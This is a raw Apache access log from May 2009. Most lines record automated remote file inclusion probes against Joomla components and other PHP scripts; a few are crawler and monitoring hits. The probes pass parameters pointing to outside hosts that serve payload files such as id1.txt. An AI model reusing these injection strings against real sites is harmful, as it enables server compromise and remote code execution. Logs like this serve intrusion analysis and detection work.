211.233.22.209 - - [25/May/2009:00:14:58 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
200.93.147.154 - - [25/May/2009:00:15:09 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:09 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:10 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:00:15:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L000AE24869715300C8ED05B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [25/May/2009:00:15:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [25/May/2009:00:15:20 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:15:20 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:15:20 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:20 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:20 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:23 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:32 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:15:47 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:07 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:07 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:07 -0400] "GET /logs/access_log.Q108062800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:16:17 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:16:23 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:16:23 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:16:23 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:00:16:27 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0044F74B09A0C400F2DB049+WSEQ(S0060):1+OUITEM(A0200):05560301 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.193.198 - - [25/May/2009:00:16:30 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:39 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:39 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:39 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:16:39 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:16:47 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:16:48 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:48 -0400] "GET /logs/access_log.Q108052200%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:16:52 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:28 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:29 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:32 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:35 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:40 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:17:45 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.122.49.5 - - [25/May/2009:00:18:09 -0400] "GET /logs/error_log.Q108061800/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
216.151.134.36 - - [25/May/2009:00:18:30 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:18:34 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:18:46 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:19:01 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.130.29.11 - - [25/May/2009:00:19:35 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:20:04 -0400] "GET /logs/access_log.Q108062800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:20:10 -0400] "GET /logs/access_log.Q108052200%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:20:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [25/May/2009:00:20:25 -0400] "GET /logs/error_log.Q109050800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:20:25 -0400] "GET /logs/error_log.Q109051400%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:20:36 -0400] "GET /logs/access_log.Q108062800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:20:42 -0400] "GET /logs/access_log.Q108052200%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:21:07 -0400] "GET /logs/error_log.Q109042700//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:21:24 -0400] "GET /logs/error_log.Q109050500//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:21:43 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.233.22.209 - - [25/May/2009:00:22:12 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
67.15.188.3 - - [25/May/2009:00:22:54 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:22:54 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:22:54 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:22:57 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:22:57 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:22:57 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:23:20 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:23:20 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:31 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:31 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:31 -0400] "GET /logs/error_log.Q108082400%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:40 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:40 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:40 -0400] "GET /logs/error_log.Q108082400%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:46 -0400] "GET /logs/error_log.Q108100400%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:23:55 -0400] "GET /logs/error_log.Q108100400%20%20/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:24:05 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:24:05 -0400] "GET /logs/error_log.Q108100400/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:24:05 -0400] "GET /logs/error_log.Q108070100/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:24:08 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:24:18 -0400] "GET /logs/error_log.Q108100400/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:24:18 -0400] "GET /logs/error_log.Q108070100/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:24:21 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:24:25 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:24:28 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.125.64.49 - - [25/May/2009:00:25:02 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.30.142.171 - - [25/May/2009:00:25:11 -0400] "GET /logs/error_log.Q108041100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [25/May/2009:00:25:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [25/May/2009:00:25:58 -0400] "GET /logs/error_log.Q109051200/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.125.64.51 - - [25/May/2009:00:25:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.212.165.114 - - [25/May/2009:00:25:59 -0400] "GET /phphtml.php?htmlclass_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:00:25:59 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:00:25:59 -0400] "GET /logs/access_log.Q108082000%20%20/phphtml.php?htmlclass_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:26:01 -0400] "GET /logs/error_log.Q109051200/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:26:47 -0400] "GET //vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:26:48 -0400] "GET /logs//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:26:48 -0400] "GET /logs/access_log.Q108091400%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.122.49.5 - - [25/May/2009:00:27:47 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
110.45.146.88 - - [25/May/2009:00:29:01 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
87.106.67.146 - - [25/May/2009:00:29:32 -0400] "GET ///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
87.106.67.146 - - [25/May/2009:00:29:32 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.67.146 - - [25/May/2009:00:29:32 -0400] "GET /logs///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:00:29:58 -0400] "GET /images/items/2PC_DRIVER_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
207.182.143.50 - - [25/May/2009:00:29:59 -0400] "GET /logs/access_log.Q109051800%20%20//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:30:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.183.32.67 - - [25/May/2009:00:30:20 -0400] "GET /logs/access_log.Q108052200%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:31:30 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:31:30 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
110.45.146.88 - - [25/May/2009:00:31:32 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:31:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:31:32 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
67.212.165.114 - - [25/May/2009:00:31:55 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:00:31:59 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [25/May/2009:00:32:11 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.239.221.37 - - [25/May/2009:00:32:25 -0400] "GET /logs/access_log.Q108070700/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:25 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:25 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:27 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:27 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:27 -0400] "GET /logs/access_log.Q108070700/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.239.221.37 - - [25/May/2009:00:32:29 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
110.45.146.146 - - [25/May/2009:00:32:29 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:32:29 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:32:29 -0400] "GET //include/admin.lib.inc.php?site_path=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
213.239.221.37 - - [25/May/2009:00:32:31 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://booting-fever.com/booting/yes.txt%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
67.15.188.3 - - [25/May/2009:00:32:48 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
110.45.146.146 - - [25/May/2009:00:32:57 -0400] "GET /logs/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.146.146 - - [25/May/2009:00:32:57 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
